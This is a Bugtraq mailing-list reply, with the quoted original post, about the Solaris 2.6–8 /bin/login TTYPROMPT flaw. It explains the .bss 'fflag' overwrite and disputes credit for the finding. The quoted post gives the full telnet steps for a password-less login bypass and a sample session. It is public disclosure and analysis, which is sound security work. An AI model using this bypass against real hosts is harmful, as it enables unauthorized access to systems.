Bugtraq mailing list archives
RE: Solaris 2.6, 7, 8
From: "Sinan Eren" <SEren () entercept com>
Date: Wed, 2 Oct 2002 13:04:27 -0700
the problem is there exists an authentication flag called the "fflag" just after the array that gets overflowed in the .bss segment. this is an array of char pointers so when it is overflowed becuase of an mismanagement on the indexing of this array the fflag gets overwritten with an valid address on .bss segment. this is good enough to satify the if(fflag) condition and spawn a shell. some truth about this finding; There is an exploit out in the wild for sometime and the example pattern shown by Jonathan is exactly thesame with the payload of that exploit. so i'm curious about this findings origin, i think credits must be given due... i'll be waiting for a clerification form Mr. Stuart. thanks, sinan -----Original Message----- From: Jonathan S [mailto:js () APOLLO GTI NET] Sent: Wednesday, October 02, 2002 9:13 AM To: bugtraq () securityfocus com Subject: Solaris 2.6, 7, 8 Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: jons () ccpartnersltd com
Current thread:
- Re: Solaris 2.6, 7, 8, (continued)
- Re: Solaris 2.6, 7, 8 buzheng (Oct 02)
- Re: Solaris 2.6, 7, 8 tb0b (Oct 03)
- Re: Solaris 2.6, 7, 8 Marco Ivaldi (Oct 03)
- Re: Solaris 2.6, 7, 8 Sebastian (Oct 05)
- Re: Solaris 2.6, 7, 8 Christopher X. Candreva (Oct 02)
- Re: Solaris 2.6, 7, 8 Gert-Jan Hagenaars (Oct 03)
- Re: Solaris 2.6, 7, 8 buzheng (Oct 02)
- Re: Solaris 2.6, 7, 8 Ido Dubrawsky (Oct 03)
- Re: Solaris 2.6, 7, 8 Ramon Kagan (Oct 03)
- Re: Solaris 2.6, 7, 8 Roy Kidder (Oct 03)
- Re: Solaris 2.6, 7, 8 Ramon Kagan (Oct 03)
- RE: Solaris 2.6, 7, 8 Sinan Eren (Oct 02)
- Re: Solaris 2.6, 7, 8 Dan Diamond (Oct 03)
- RE: Solaris 2.6, 7, 8 Morgan (Oct 04)